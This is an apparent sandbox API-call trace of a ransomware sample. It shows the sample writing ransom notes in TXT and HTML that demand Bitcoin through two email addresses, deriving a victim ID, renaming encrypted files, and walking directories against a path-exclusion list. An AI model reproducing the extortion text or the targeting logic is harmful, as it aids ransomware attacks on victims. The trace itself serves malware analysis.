	[0175.319] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}"
	[0175.320] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*"
	[0175.320] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.320] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.320] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0175.320] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.321] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.321] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.325] CloseHandle (hObject=0x388) returned 1
	[0175.326] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.326] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.327] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0175.328] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.328] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.329] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.329] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.329] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0175.329] CloseHandle (hObject=0x388) returned 1
	[0175.330] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.330] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.330] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.330] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0175.331] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.331] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.331] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0175.334] CloseHandle (hObject=0x388) returned 1
	[0175.334] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.335] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.336] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0175.337] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.337] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.337] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.337] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.338] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0175.339] CloseHandle (hObject=0x388) returned 1
	[0175.339] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82042f80, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8208f26c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0175.340] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*") returned 84
	[0175.340] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.340] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*") returned 0x54
	[0175.340] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.340] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="windows") returned 0x0
	[0175.340] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.340] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="boot") returned 0x0
	[0175.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.341] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="system volume information") returned 0x0
	[0175.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.341] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.341] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="temp") returned 0x0
	[0175.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.342] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="program files") returned 0x0
	[0175.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.342] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.343] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="appdata") returned 0x0
	[0175.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.343] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="application data") returned 0x0
	[0175.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.343] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="winnt") returned 0x0
	[0175.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.343] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="tmp") returned 0x0
	[0175.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.344] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="cache") returned 0x0
	[0175.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.344] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.344] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="webcache") returned 0x0
	[0175.344] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.345] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="inetcache") returned 0x0
	[0175.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.345] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="nvidia") returned 0x0
	[0175.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.345] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="packages") returned 0x0
	[0175.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.346] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="cookies") returned 0x0
	[0175.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.346] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="programdata") returned 0x0
	[0175.346] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.346] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.346] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82042f80, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8208f26c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0175.346] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.346] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81ff675f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81ff675f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8201ca9e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x720, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0175.347] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8208f26c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8208f26c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x820b567d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.347] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82069088, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82069088, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8208f26c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.347] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82042f80, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82042f80, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82042f80, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0175.347] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.347] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0175.347] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0175.347] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}"
	[0175.347] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\"
	[0175.347] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov"
	[0175.348] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov"
	[0175.348] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\"
	[0175.348] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\"
	[0175.348] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*"
	[0175.348] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660034, dwReserved1=0x7d0062, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.348] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*") returned 89
	[0175.349] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.349] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*") returned 0x59
	[0175.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.349] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0175.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.349] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0175.349] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.350] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0175.350] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.350] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.350] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.350] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0175.350] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.351] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0175.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.351] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.351] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0175.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0175.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0175.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0175.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0175.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
